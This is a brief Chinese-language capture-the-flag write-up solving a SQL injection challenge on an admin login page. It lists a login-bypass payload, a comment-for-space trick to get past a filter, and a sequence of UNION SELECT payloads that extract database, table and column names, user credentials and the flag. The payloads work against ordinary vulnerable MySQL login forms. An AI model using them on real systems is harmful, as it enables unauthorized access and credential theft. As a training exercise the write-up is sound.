进入页面,我们看到网页标题为管理员后台,尝试使用万能密码进行登录
'or '1'='1'#
登录后发现登录成功,网页有回显,尝试进行sql注入
'or '1'='1' order by 3#
网址回显错误,猜测空格被屏蔽,使用/**/代替尝试
'or '1'='1'/**/order/**/by/**/3#
回显输入为3时可以正常登录,回显为4显示错误,推测回显位为3。
尝试进行爆库名
'or '1'='1'/**/union/**/select/**/database(),2,3#
获得库名为yunxi_exam,进行爆表名
'or '1'='1'/**/union/**/select/**/(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='yunxi_exam'),1,2#
获得表名为bighacker,users。进行爆列
'or '1'='1'/**/union/**/select/**/(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='users'),1,2#
获得列名,但是其中不包含flag项。先尝试打开username和password列查看数据
'or '1'='1'/**/union/**/select/**/(select/**/group_concat(username,0x3a,password)/**/from/**/users),1,2#
爆数据后未发现flag,于是尝试从另一个表入手
'or '1'='1'/**/union/**/select/**/(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='bighacker'),1,2#
得到列名,尝试爆数据
'or '1'='1'/**/union/**/select/**/(select/**/group_concat(hack1,hack2,hack3)/**/from/**/bighacker),1,2#
获得flag,此题结束。